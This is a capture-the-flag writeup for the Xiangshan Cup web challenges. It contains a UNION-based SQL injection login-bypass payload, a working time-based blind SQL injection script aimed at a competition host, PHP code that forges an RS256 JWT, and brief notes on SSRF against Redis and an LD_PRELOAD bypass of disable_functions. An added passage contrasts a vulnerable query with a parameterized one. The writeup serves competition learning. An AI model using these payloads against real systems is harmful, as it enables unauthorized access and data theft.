
Xiangshan Cup Cyber Security Attack and Defense Competition - Writeup

Xiangshan Cup WEB

login

Testing showed that union is not filtered and that the database is MySQL 8, so we can use values directly to generate a new row; note that the password has to be the md5 hash.

username=aadmin' union values row(1,'admin','21232f297a57a5a743894a0e4a801fc3')#&password=admin&login=login
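The payload above works only because the username is spliced into the SQL text, so the UNION row the attacker supplies becomes the row the login check compares against. The following is an added example, not code from the writeup or the challenge: it rebuilds the login lookup on an in-memory SQLite table, once with string concatenation and once with a bound parameter, and runs the writeup's payload against both. The table layout (id/username/password, unsalted md5 hex) is an assumption, and the payload is adapted from MySQL 8 syntax (`union values row(...)`, `#` comment) to SQLite (`union select ...`, `--` comment).

```python
import hashlib
import sqlite3

# Constructed stand-in for the challenge's user table. Assumptions (not from the
# writeup): columns id/username/password, with unsalted md5 hex digests as the
# writeup's payload implies.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table user (id integer, username text, password text)")
    db.execute(
        "insert into user values (1, 'admin', ?)",
        (hashlib.md5(b"real-admin-password").hexdigest(),),
    )
    return db


def login_vulnerable(db, username, password):
    """Login the way a concatenating query behaves: the username becomes part
    of the SQL text, so a crafted username can append a UNION row whose hash
    the attacker chose."""
    sql = "select id, username, password from user where username = '%s'" % username
    row = db.execute(sql).fetchone()
    return row is not None and row[2] == hashlib.md5(password.encode()).hexdigest()


def login_hardened(db, username, password):
    """Same lookup with a bound parameter: the username is data, never SQL,
    so the quote and the UNION are matched literally against the column."""
    sql = "select id, username, password from user where username = ?"
    row = db.execute(sql, (username,)).fetchone()
    return row is not None and row[2] == hashlib.md5(password.encode()).hexdigest()


# The writeup's payload, adapted to SQLite syntax; the hash is md5("admin").
PAYLOAD = "aadmin' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'--"


def demo():
    db = make_db()
    return {
        "vulnerable_accepts_payload": login_vulnerable(db, PAYLOAD, "admin"),
        "hardened_accepts_payload": login_hardened(db, PAYLOAD, "admin"),
        "hardened_accepts_real_creds": login_hardened(db, "admin", "real-admin-password"),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenating version accepts the payload with password `admin` even though no such user exists, because the UNION row supplies the hash being compared; the parameterized version looks for a user literally named `aadmin' union select ...` and finds nothing. Filtering keywords such as `union` is not a substitute for binding parameters.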

海量视频 (Massive Video)

Time-based blind injection recovers the password directly:

import requests


def ord2hex(string):
    # Turn a string into a single 0x... hex literal (kept from the original
    # script; not used by the loop below).
    result = ""
    for i in string:
        r = hex(ord(i))
        r = r.replace('0x', '')
        result = result + r
    return '0x' + result


tables = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
flag = ""
# Guess admin's pwd one position at a time: a correct guess makes the
# server sleep(5), which trips the 2-second client timeout.
for i in range(1, 50):
    for j in range(36, 128):
        data = {
            'username': "admin' and if((ord(mid((select pwd from user where username='admin'),%s,1))=%s),sleep(5),1)#" % (i, j),
            'pwd': 'admin',
        }
        try:
            r = requests.post('http://eci-2ze2somogyzyy5tuz8cx.cloudeci1.ichunqiu.com', data=data, timeout=2)
        except Exception as e:
            # A timeout means the condition held, so chr(j) is the next character.
            flag = flag + chr(j)
            print(flag)
            break

F12 reveals an arbitrary file read, so we read the source directly and find that JWT forgery is required; download the public key and forge the JWT:

<?php
include('JWT.php');
include('Key.php');
use Firebase\JWT\JWT;
use Firebase\JWT\Key;

$privateKey = <<<EOD
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
EOD;

$publicKey = <<<EOD
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrC+gEPuf8kPP5QXqT74Fp+w/u
Sk57DeSrc8PnxJ3IjbrklWB9shUnoNnAs2I8SveYgrMVXcjodqhTjh9xDRTwSdqm
i+HUqDyrzkoHRkhs+o5wvIm7WbkQCp6EqYX5FmJqBlEAUVlNMgBEA+rLB7S4qoWz
MlkyJhdQctao972JkQIDAQAB
-----END PUBLIC KEY-----
EOD;

$payload = array(
    "name" => "admin",
    "pwd" => 'jw2fdkci2F2md2FFA4',
    "isadmin" => true,
);

$jwt = JWT::encode($payload, $privateKey, 'RS256');
echo "Encode:\n" . print_r($jwt, true) . "\n";

$decoded = JWT::decode($jwt, new Key($publicKey, 'RS256'));
$sqlres = "select * from user where username = '" . $decoded->name . "';";
echo $sqlres;
/*
 NOTE: This will now be an object instead of an associative array. To get
 an associative array, you will need to cast it as such:
*/

$decoded_array = (array) $decoded;
echo "Decode:\n" . print_r($decoded_array, true) . "\n";
  • Logging in with the forged cookie succeeds directly:


  • The backend SSRF is used to attack Redis directly and get a shell


  • After getting the shell we need to bypass disable_functions; error_log is not banned, so LD_PRELOAD can be used for the bypass. AntSword's built-in version did not work well, so we uploaded our own and ran readflag
